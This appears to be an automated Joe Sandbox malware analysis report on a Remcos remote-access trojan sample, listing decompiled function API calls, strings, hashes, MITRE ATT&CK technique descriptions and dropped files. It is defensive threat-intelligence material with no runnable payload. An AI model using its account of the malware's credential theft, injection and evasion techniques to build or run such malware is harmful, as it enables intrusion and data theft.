Function 00439180 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84cd3596bf9b84727abbb8ac317bd9742e37cc1944824ab92f6867873fd2e3e7
Instruction ID: 10b1f3d7627c42508a6416dc4a5d0091a6d6fc87295882acb0a4a0c041449646
Opcode Fuzzy Hash: 84cd3596bf9b84727abbb8ac317bd9742e37cc1944824ab92f6867873fd2e3e7
Instruction Fuzzy Hash: 7E01F2B29092133EFB101A786CC9D6B671CDB493B8B20232BF531612D0DEA8CD004168

Function 0043D027 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue), ref: 0043D059
GetLastError.KERNEL32(?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000,00000364,?,0043C6E6), ref: 0043D065
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000), ref: 0043D073

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: f98deec6f88989dbb97caf1a032761cc789a0d03a01cb996637bfc0b03a42118
Instruction ID: 5d9f9412c01da8515830be1498c2801d5041f6bd8c42a3f808218046de21a0a4
Opcode Fuzzy Hash: f98deec6f88989dbb97caf1a032761cc789a0d03a01cb996637bfc0b03a42118
Instruction Fuzzy Hash: 6201F736E013229BC7254B78BC44A573BB8AF4AF65F200532F91AD7250DB24D803C6EC

Function 004149E0 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A11
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A36
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,004108FA), ref: 00414A44

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: b29290ef8a26601d1e65e3241c7cbe039584115e2aa5b79a7dea1b5784ff6f02
Instruction ID: db7a0aeb4d4afb4a2176950650ac5b06a426b4e70c5552e06deca07cffb9f33f
Opcode Fuzzy Hash: b29290ef8a26601d1e65e3241c7cbe039584115e2aa5b79a7dea1b5784ff6f02
Instruction Fuzzy Hash: D101F974A41208BFE7105B61DC85EFF776CEB863A4F10016AFD01A3280C6744E019678

Function 0041227E Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 0041228E
GetSystemMetrics.USER32(0000004D), ref: 00412294
GetSystemMetrics.USER32(0000004E), ref: 0041229A
GetSystemMetrics.USER32(0000004F), ref: 004122A1

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 053db17e7a6c52d0060b6f2d2fb2ff70657ecfa06d353a12bf392e0d8bad21fb
Instruction ID: 89de0d755d70642537d1d436af62c14b4b11da7e22818bda6a47393979baae43
Opcode Fuzzy Hash: 053db17e7a6c52d0060b6f2d2fb2ff70657ecfa06d353a12bf392e0d8bad21fb
Instruction Fuzzy Hash: 7001AC71F002286BDB109FA9CC41A9D7B95DF44760F10406BEE0CEB340D9B8AD4047C8

Function 00414699 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000018,00000000), ref: 004146B1
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000018,00000000), ref: 004146C4
CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146EF
CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146F7

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: 1af01056c3ae6bb1cb7cae0660ad155511764e7b69f07d9f8ce8de45e1cfa6e6
Instruction ID: b8317d07de67e98f9920d3d33bcb499745fd15691e2d04bf827ba3f8c6195df7
Opcode Fuzzy Hash: 1af01056c3ae6bb1cb7cae0660ad155511764e7b69f07d9f8ce8de45e1cfa6e6
Instruction Fuzzy Hash: 98014E753002046BD61057545C49FFB736CDB8579AF000166FA88D2190EFAC8C81456E

Function 0042FA11 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0042FA28

Part of subcall function 00430060: ___AdjustPointer.LIBCMT ref: 004300AA

_UnwindNestedFrames.LIBCMT ref: 0042FA3F
___FrameUnwindToState.LIBVCRUNTIME ref: 0042FA51
CallCatchBlock.LIBVCRUNTIME ref: 0042FA75

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 3bc4621ae17e63219c49621585e226d06ab1c41b19007eb81c6da07df0bbe7b5
Instruction ID: 46f6367602a7af8e8c080bc3d9db011f884b2cca7bf67df38f357a6d7b2bfad7
Opcode Fuzzy Hash: 3bc4621ae17e63219c49621585e226d06ab1c41b19007eb81c6da07df0bbe7b5
Instruction Fuzzy Hash: 1B011B32100118BBCF129F56DC05EDB7BB6FF48714F45812AF91862121C37AE865DB94

Function 0042E743 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0042E743
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0042E748
___vcrt_initialize_locks.LIBVCRUNTIME ref: 0042E74D

Part of subcall function 00431D68: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00431D79

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0042E762

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
Instruction ID: 553a3698c3aa90dbaf59acd9f5d3f90f695d611f681d1e27becbad91c9f45b66
Opcode Fuzzy Hash: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
Instruction Fuzzy Hash: 7FC04818604220512EA8BAB333032AE03000CEB3DDFE434CFACA5272239E0E340B603F

Function 0043BCAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0043BD3D

Strings

pow, xrefs: 0043BD15, 0043BD32

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4b91a563d960731c995c8f312f2b7ca282ace2253d8e8cdccd3d1816b9aa4853
Instruction ID: 0dc8c32c25bbfe63b0c08367986f7c886cc6088a9617a128ed0d147125553272
Opcode Fuzzy Hash: 4b91a563d960731c995c8f312f2b7ca282ace2253d8e8cdccd3d1816b9aa4853
Instruction Fuzzy Hash: FA519A61A0460186E7117718CD823BB3BA0EB46741F20596FF5C6863A9EB3DCCD19A8F

Function 00421E84 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00421ED3
_memcmp.LIBVCRUNTIME ref: 00421FA3

Strings

01B, xrefs: 0042202A, 00421FEF, 00421FA8

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memcmp
String ID: 01B
API String ID: 2931989736-2242190220
Opcode ID: e631a8cb302e0db55f470f521299e41934546e7d6a45f37c751ecbb6d8a4233c
Instruction ID: b681089afacfdc10096d0b0687866a9e2916795602fd0264882fd2f37da336bc
Opcode Fuzzy Hash: e631a8cb302e0db55f470f521299e41934546e7d6a45f37c751ecbb6d8a4233c
Instruction Fuzzy Hash: F151B531B00626ABCB21CF6AEA80A6BF7B5FF54310F95812ADD5897320D735ED11CB84

Function 0040D72E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0040D763

Part of subcall function 0040D476: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
Part of subcall function 0040D476: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

RegCloseKey.ADVAPI32(?,00459594,00459594,0045962C,0045962C), ref: 0040D8B7

Strings

X|F, xrefs: 0040D784

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: X|F
API String ID: 3114080316-2178643013
Opcode ID: 8657c457f44454869b7a86774b43540244445b8884b6d32a4f7182bec9a3751e
Instruction ID: 52a15b34a4ac20fa923b067356e63d5415b277d9ab81aa83f9cc7be8be0fef2c
Opcode Fuzzy Hash: 8657c457f44454869b7a86774b43540244445b8884b6d32a4f7182bec9a3751e
Instruction Fuzzy Hash: 5641AD71A002185ACB04F775DCA6AEE77649B91308F40817FF60A772D2EF781E89C65E

Function 00443D48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00443FA3,?,00000050,?,?,?,?,?), ref: 00443E23

Strings

OCP, xrefs: 00443D9C
ACP, xrefs: 00443D66

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
Instruction ID: d655ddf23005c5a9f15a52119ce0e88508a13c35cbcc5d652d1131ff6491d290
Opcode Fuzzy Hash: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
Instruction Fuzzy Hash: 3421C1A2E00101A6FB248E64D901B9B72A6EF54F57F668427F90AD7304E73ADF01C398

Function 00401E12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00401E49

Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6

GetLocalTime.KERNEL32(?), ref: 00401EA1

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00401E3E

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: d2551ff06c508966204778e269e6d5628556bda4d2d3490b73be2430c0923865
Instruction ID: 1d52dbcb1ff0e0c2d988e19544ba4eb29f5678dad8abbd2e12691aec51a988aa
Opcode Fuzzy Hash: d2551ff06c508966204778e269e6d5628556bda4d2d3490b73be2430c0923865
Instruction Fuzzy Hash: 9D21D171E0424067CB10B7BAED0A7EEBB245793345F14413EEC01272E2EEB85949C7AB

Function 00413BCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 00413BE6

Strings

%02i:%02i:%02i:%03i , xrefs: 00413BFB
| , xrefs: 00413C19

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 401af5ccc1cab520af356f105505c2aad688da410eea88cdee17d0666efcdc99
Instruction ID: c71449d0853176ac06c3336b483bb21f3570e9d7b28fb8d8682e76423a61a460
Opcode Fuzzy Hash: 401af5ccc1cab520af356f105505c2aad688da410eea88cdee17d0666efcdc99
Instruction Fuzzy Hash: C91151725183055BC304FB75D8558ABB3E8AB94709F50093FFA8A920D1FF7CDA88C65A

Function 0043490A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004349A0
GetLastError.KERNEL32(?,?), ref: 004349AE
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?), ref: 00434A09

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 22b6cbf06836f6600c0e7c3de66aaecea1dd54ab08b00387fa4f3e6206e4a88e
Instruction ID: cc1d80011ffea3f1df985999827adad67b7e2f370d91c135a993c9fa55757793
Opcode Fuzzy Hash: 22b6cbf06836f6600c0e7c3de66aaecea1dd54ab08b00387fa4f3e6206e4a88e
Instruction Fuzzy Hash: FE410935A00201AFDF219F65C844BFBBBA4EFCA310F1451AAF859572A1D738AD01C75C

Function 0040C9C0 Relevance: 5.1, APIs: 4, Instructions: 125COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 0040C9EE
IsBadReadPtr.KERNEL32(?,00000014), ref: 0040CAC3
SetLastError.KERNEL32(0000007F), ref: 0040CADE
SetLastError.KERNEL32(0000007E,?,0040CD60), ref: 0040CAF7

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
Instruction ID: 499532b790c8abcea526b823558a84bddce30115e00368c610d72d2e208af3f3
Opcode Fuzzy Hash: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
Instruction Fuzzy Hash: AD416671B00209DFDB24CF99D884B6AB7F5EF48310F10856AE506A7291EB78E801CF54

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report scan_doc20241024.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

Spreading

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pevfhq3.qkz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blz4h04t.10f.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4r4efso.me3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkq234rg.kxd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiqzd4rg.3ij.ps1

Windows Analysis Report
scan_doc20241024.vbs

Function 00414EED Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 164
libraryloaderCOMMON

Function 0040A6C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85
sleepCOMMON

Function 00401D6F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
timethreadCOMMON

Function 0042B1E6 Relevance: 4.5, APIs: 3, Instructions: 33
encryptionCOMMON

Function 0040E92F Relevance: 39.3, APIs: 4, Strings: 18, Instructions: 789
sleepnetworkCOMMON

Function 0040A1D6 Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 328
threadsleepfileCOMMON

Function 0040170E Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Function 00401C4F Relevance: 18.1, APIs: 12, Instructions: 60
synchronizationCOMMON

Function 004139A6 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60
COMMON

Function 0043C698 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMONLIBRARYCODE

Function 0040D202 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Function 0040CF8C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
registryCOMMON

Function 0040D033 Relevance: 4.5, APIs: 3, Instructions: 44
